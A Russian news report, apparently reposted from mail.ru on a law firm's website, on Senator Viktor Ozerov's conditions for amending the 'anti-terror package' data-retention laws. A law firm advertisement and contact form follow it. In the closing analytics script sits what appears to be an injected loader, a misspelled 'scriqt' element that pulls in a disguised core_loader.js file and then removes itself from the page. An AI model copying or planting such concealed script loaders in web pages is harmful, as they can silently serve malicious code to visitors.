В СФ назвали условия для изменения «антитеррористического пакета» законов

В СФ назвали условия для изменения «антитеррористического пакета» законов

Совет Федерации будет внимательно отслеживать этот вопрос, и если операторы объективно докажут, что пользователям сотовой связи и интернета грозит значительное, в несколько раз, повышение тарифов, то Совет Федерации вновь вернется к этой норме закона и в случае необходимости внесет в нее изменения.

Виктор Озеров, глава комитета Совфеда по обороне и безопасности

Озеров отметил, что пока заявления сотовых операторов о неизбежном росте тарифов для пользователей являются «эмоциональными и не подкрепленными расчетами».

Сенатор также напомнил, что поправки должны вступить в силу лишь с 1 июля 2018 года, и до этого времени «нет никаких юридических оснований» говорить о повышении тарифов. По мнению главы комитета Совфеда по обороне, у сотовых операторов есть возможность совместно с правительством определить сроки, порядок и объём информации, которую закон обязывает их хранить.

Пакет новых законов, который Совет Федерации одобрил накануне, обязывает операторов связи в течение трех лет хранить информацию о звонках, текстовых сообщениях, фотографиях, звуковых и видеофайлах. В течение полугода будут сохраняться данные о содержании разговоров и переписки.
Крупнейшие российские сотовые операторы (МТС, «Вымпелком», «Мегафон» и Tele2) заявили, что принятие документа повлечет рост тарифов для абонентов и падение качества услуг связи. Уполномоченный при президенте по защите прав предпринимателей Борис Титов, в свою очередь, заявил, что закон является невыполнимым.

Законы были разработаны главами профильных комитетов двух палат парламента: председателем думского комитета по безопасности Ириной Яровой и главой комитета Совфеда по обороне и безопасности Виктором Озеровым.

Источник: mail.ru

Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');